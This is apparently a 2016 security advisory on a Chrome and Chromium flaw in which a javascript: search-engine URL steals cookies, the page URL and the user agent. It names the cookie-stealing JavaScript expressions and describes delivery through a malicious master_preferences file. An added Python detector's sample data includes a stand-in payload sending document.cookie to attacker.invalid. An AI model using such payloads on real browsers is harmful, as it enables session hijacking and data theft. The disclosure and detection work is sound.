In December 2015, Hivint's Technical Security Specialist, Taran Dhillon, discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, including authentication data and personal information, from a target user.
The issue was reported to the Google/Chromium team, but as of July 2016 it has not been fixed.
Figure: Chrome default search settings, with the Google search engine configured as the default search engine.
Because Google Chrome is the most popular web browser, used by approximately 71.4% of all internet users, this vulnerability presents a significant security risk.
The exploit uses the following JavaScript expressions to collect data from the victim's browser (escape() is a legacy encoder that makes the collected value safe to place in a URL):
- `escape(document.cookie);` – used to steal the user's browser cookies. Cookies contain information about the current user and may include: session identifiers (generated when a user logs into a website to uniquely identify that user's session), the contents of the user's shopping cart on an e-commerce site, and tracking information (used to track the user's browsing habits, geographic location and source IP address).
- `escape(navigator.userAgent);` – reveals the target user's browser type and version.
- `escape(document.baseURI);` – contains the URL of the page the user is currently viewing.
How to check if you’re vulnerable
To check whether your web browser (Google Chrome / Chromium) is vulnerable, perform the following steps:
- Navigate to Settings → Manage Search Engines.
- Scroll to the bottom of the Other Search Engines table.
- Click in the box marked Add a new search engine and enter any text, e.g. poison.
- Click in the box marked Keyword and enter any text, e.g. poison.
- If the text box turns from red to white, your browser is vulnerable.
Replacing Chrome's "master_preferences" file (the file Chrome reads on first run to set all of its default settings) is one method an attacker can use to deliver the exploit to a victim machine.
The code below creates a malicious "master_preferences" file that redirects every search the victim performs to the attacker's web server (which receives the victim's browser cookies, current URL and browser software information) and then sends the victim back to their original Google search.
The result is a seamless compromise of the victim's web browser that is extremely difficult for them to detect.
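The manual check above tests one profile by hand. The same indicator, a configured search engine whose URL is a `javascript:` URL, can also be looked for on disk: in a profile's "Web Data" SQLite database (table `keywords`) and in a `master_preferences` file, the delivery path just described. The script below is an added example written for this article, not the author's code or any Chrome tooling. The table schema is a constructed subset of the real `keywords` table, the sample rows and the `master_preferences` fragment are constructed, and the `default_search_provider` / `search_url` key names are an assumption that may differ between Chrome versions.

```python
"""Added example: flag Chrome/Chromium search engines whose URL is a
javascript: URL, the indicator behind the manual check and the
master_preferences delivery path described in the article.
Not the author's exploit code; schema, rows and JSON below are constructed."""
import json
import re
import sqlite3

# Constructed subset of the `keywords` table in a profile's "Web Data" file
# (assumption: the real table has many more columns).
KEYWORDS_SCHEMA = """
CREATE TABLE keywords (
    id INTEGER PRIMARY KEY,
    short_name TEXT NOT NULL,
    keyword TEXT NOT NULL,
    url TEXT NOT NULL
);
"""

# Constructed sample rows: one legitimate engine and two javascript: engines,
# the second with leading whitespace and mixed-case scheme.
SAMPLE_ROWS = [
    (1, "Google", "google.com", "{google:baseURL}search?q={searchTerms}"),
    (2, "poison", "poison",
     "javascript:location='http://attacker.invalid/?c='+escape(document.cookie)"),
    (3, "innocent", "i", "  JavaScript:void(0)//%s"),
]

# Constructed master_preferences fragment (key names are an assumption).
SAMPLE_MASTER_PREFERENCES = json.dumps({
    "default_search_provider": {
        "enabled": True,
        "name": "Google",
        "keyword": "google.com",
        "search_url": "javascript:/* exfil */location='{searchTerms}'",
    }
})

# Whitespace and C0 control characters, which browsers strip from URLs.
_STRIP = re.compile(r"[\s\x00-\x1f]+")


def is_javascript_url(url):
    """True if `url` is a javascript: URL once whitespace/control characters
    are removed and the scheme is case-folded (so trivially obfuscated
    variants are still caught)."""
    return _STRIP.sub("", url).lower().startswith("javascript:")


def find_javascript_search_engines(conn):
    """Return (short_name, keyword, url) for every keywords row whose URL is
    a javascript: URL."""
    rows = conn.execute(
        "SELECT short_name, keyword, url FROM keywords ORDER BY id")
    return [row for row in rows if is_javascript_url(row[2])]


def find_javascript_default_provider(master_prefs_text):
    """Return the default search provider's search_url from a
    master_preferences document if it is a javascript: URL, else None."""
    prefs = json.loads(master_prefs_text)
    url = prefs.get("default_search_provider", {}).get("search_url", "")
    return url if is_javascript_url(url) else None


def build_sample_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(KEYWORDS_SCHEMA)
    conn.executemany("INSERT INTO keywords VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


if __name__ == "__main__":
    # For a real profile, copy the "Web Data" file first and connect to the copy.
    db = build_sample_db()
    for name, keyword, url in find_javascript_search_engines(db):
        print(f"suspicious search engine {name!r} (keyword {keyword!r}): {url}")
    hit = find_javascript_default_provider(SAMPLE_MASTER_PREFERENCES)
    if hit:
        print("master_preferences default search provider is a javascript: URL:", hit)
```

Chrome keeps the "Web Data" file locked while it is running, so copy it to a scratch location before opening the copy with `sqlite3.connect`. The normalisation in `is_javascript_url` deliberately strips whitespace and control characters and lowercases the scheme, because a plain `startswith("javascript:")` check would miss a URL such as `  JavaScript:...`, which a browser still treats as a JavaScript URL.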
This video demonstrates how the vulnerability can be exploited:
- The user is tricked into running malicious software.
- The exploit carried by the malicious software runs on the victim's machine when the user opens the Chrome browser and searches for 'pwned'.
- The victim's information is transmitted to and intercepted by the attacker, and the victim is silently redirected back to their search, so the attack goes unnoticed.
How can I prevent myself from being exploited?
Currently, the only effective mitigation is to uninstall Google Chrome or Chromium and stop using them. In addition, do not click untrusted links on websites, and do not open attachments or links in emails that are unexpected, come from untrusted sources or otherwise seem suspicious.
Article by Taran Dhillon, Security Specialist, Hivint